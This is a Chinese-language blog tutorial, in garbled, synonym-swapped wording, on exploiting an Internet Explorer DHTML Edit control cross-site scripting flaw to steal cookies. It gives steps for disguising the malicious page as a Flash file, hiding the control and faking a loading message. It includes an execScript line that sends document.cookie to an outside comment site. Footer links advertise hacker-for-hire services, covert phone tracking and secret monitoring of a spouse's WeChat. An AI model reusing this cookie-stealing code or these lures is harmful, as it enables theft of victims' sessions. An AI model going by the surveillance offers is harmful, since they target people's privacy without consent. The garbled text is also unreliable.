微软在去年宣布了MSIE DHTML Edit控件跨站剧本破绽，然则圈内一直没有宣布出好用的EXP，害得一帮新手叫苦不迭，别急，这不是为人人送来了大餐吗？！ [受影响系统] Microsoft Internet Explorer 6.0- Microsoft Windows XP Professional SP1 - Microsoft Windows XP Professional - Microsoft Windows XP Home SP1 - Microsoft Windows XP Home - Microsoft Windows ME - Microsoft Windows 98 SE - Microsoft Windows 98 - Microsoft Windows [破绽形貌] Microsoft Internet Explorer DHTML edit控件不正确过滤部门数据，远程攻击者可以行使这个破绽举行跨站剧本攻击，获得敏感信息。DHTML编辑控件存在一个安全问题可被父窗口接见，包罗Script函数，攻击者使用exeScript直接注入javascript到控件，当目的用户打开恶意链接时，会导致恶意剧本代码执行，泄露敏感信息。看来只能影响到IE 6.0版本，而且对Windows XP SP2没有作用，不外没有给XP打SP2补丁的用户不在少数，这个破绽的行使价值照样蛮大的。由于我使用的是Windwos XP SP1正好存在这个破绽，我们就先来测试一下吧，在内陆确立如下内容的HTML页面：测试用IE浏览器打开，若是你的系统存在这个破绽，看泛起了什么。呵呵，弹出了我在黑防论坛上的Cookie信息。不外这个页面行使起来很不利便，而且成功率不高，若是没等到DHTML控件加载完毕就点击确定，是不会弹出任何Cookie信息的。没等到页面加载完毕就点击弹出的第一个确定，一定会攻击失败，看来照样不足的。我们来对这个页面举行一下弥补和修改吧，使得它成为一个成功率高的偷取Cookie信息的网页，好了，我们现在最先着手。为了增添加载时间我们先将setTimeout('main()',)中的参数改大一些，就设成把，也就是10秒，够长了。虽然页面显示着正在加载，但状态栏中却显示着完毕，我们来修改状态栏的文字，加入如下的函数：function clock() {var title="正在装载，请稍后++++++++++++++";status=title;}为了尽可能的诱使浏览者去打开这个页面，我们把它更名成.swf花样的文件，即把此页面伪装成一个Flash文件。在页面中加入：同时隐藏DHTML控件，即将DHTML空间的width，height属性设置成0。为了将Cookie发送，我们添加如下剧本：x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhangamp;fdEmail=zhang@1.comamp;fdArticleId=amp;fdTitle=amp;fdLink=amp;func=addamp;s1=B7A2B1EDC6C0C2DBamp;fdComments='+document.cookie)");这是为了测试利便，我将浏览者的Cookie信息发送到了网上一个揭晓谈论的地方了。最终的测试页面是：测试

版权声明：

1、本文由SEO作者-小六SEO原创宣布，保留著作所有权，转载请注明泉源，否则谢绝转载;
2、非原创内容会有明确作者及泉源标注。

上一篇：黑客接单平台-qq专业接单黑客联系方式
下一篇：先办事后付款的黑客qq黑客接单 无定金

相关内容

• 浙江衢州一工厂发生
• 怎么定位别人的手机
• 手机号码定位的三种
• 有手机号码若何定位
• 教你怎么把对方微信
• 用自己手机查妻子和

• ·教你定位他人位置无需赞成（免费
• ·教你输入手机号免费查位置（输入
• ·不收费的定位软件找人（什么软件
• ·一米一次手机定位软件网站（1米
• ·怎么观察一个人的信息（观察一个
• ·观察一个人需要多少钱（观察一个
• ·网上卖微信监控是真的吗（可以监
• ·怎样同步吸收别人微信谈天内容（
• ·怎么同步妻子的微信谈天记录不被
• ·教你怎样远程监控妻子手机（远程
• ·网上说可以监控微信是真的吗（网
• ·怎么周全监控另一部手机（远程监
• ·怎样可以吸收老公微信（偷偷同步
• ·私下观察一个人怎么查（怎样观察
• ·不用密码怎么登录别人微信（不知
• ·盗微信密码黑客软件手机版（盗微
• ·私家侦探啊用度多少钱（找个侦探
• ·教你怎么偷偷登微信对方不知道（